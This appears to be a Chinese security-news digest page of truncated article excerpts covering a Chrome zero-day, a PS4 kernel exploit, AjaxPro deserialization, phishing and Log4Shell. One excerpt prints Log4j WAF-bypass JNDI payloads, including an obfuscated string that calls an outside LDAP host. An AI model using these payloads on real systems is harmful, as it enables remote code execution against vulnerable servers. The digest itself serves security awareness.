Windows Token原理及利用
STATEMENT声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。雷神众测...
每日安全动态推送(12-14)
Tencent Security Xuanwu Lab Daily News• PS4 9.00 Kernel Exploit:https://github.com/ChendoChap/pOOBs4 ・ 有研究员发布 PS4...
谷歌紧急修复正被利用Chrome高严重零日漏洞
谷歌发布了适用于Windows、Mac和Linux 的Chrome96.0.4664.110,以解决在野外被利用的高严重性零日漏洞。“谷歌知道有报道称CVE-2021-4102漏洞存在于野外,”浏...
Log4j Bypass WAF Payloads
${jndi:ldap://127.0.0.1:1389/ badClassName} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${...
【最新漏洞预警】开源组件漏洞之CVE-2021-23758 AjaxPro.NET反序列化漏洞
关注公众号回复“漏洞”获取环境或工具又一个开源组件漏洞来了!最近某核弹级漏洞让大家认识到,一旦开源中间组件存在漏洞,影响范围之大将难以估量。蹭一波热...
青骥原创 l 网络安全文化实践
青骥信息安全原创技术专题人们经常讨论强大的安全文化的重要性,但却没有定义安全文化的含义,更重要的是,为什么它如此重要,什么是组织使命的价值文化?文...
Log4shell中被忽视的威胁:BurpSuite插件
log4shell可以说是这几天最火爆的漏洞,对于红队人员,算是过了个早年。不过此漏洞覆盖范围之广,也可能殃及你我。这个漏洞已经爆出来好几天了,各大厂商都开...
G.O.S.S.I.P 学术论文推荐 2021-12-13 Translating C to safer Rust
最近学编程语言不提Rust都不好意思和别人打招呼了,可是我们这些只会C语言的老程序员怎么办呢?别怕,今天的论文推荐给你介绍一篇将C代码自动化翻译成Rust代...
博闻驭识 U-Logue百科丨无人驾驶车辆感知和理解世界的两个基本问题
出品 | 驭势科技知圈 | 进“域控制器群”请加微13636581676,备注域引言:无人驾驶车辆在运行中需要面对白天、黑夜、黄昏、大风、暴雨、雾...
攻击技术研判|Microsoft应用程序安装新方式ms-appinstaller 钓鱼攻击利用
情报背景近期,SOPHOS安全团队捕获了一次钓鱼攻击,攻击对象包括SOPHOS团队本身。攻击者冒充公司内部成员发送邮件,恐吓收件人没有及时处理客户投诉,并诱使...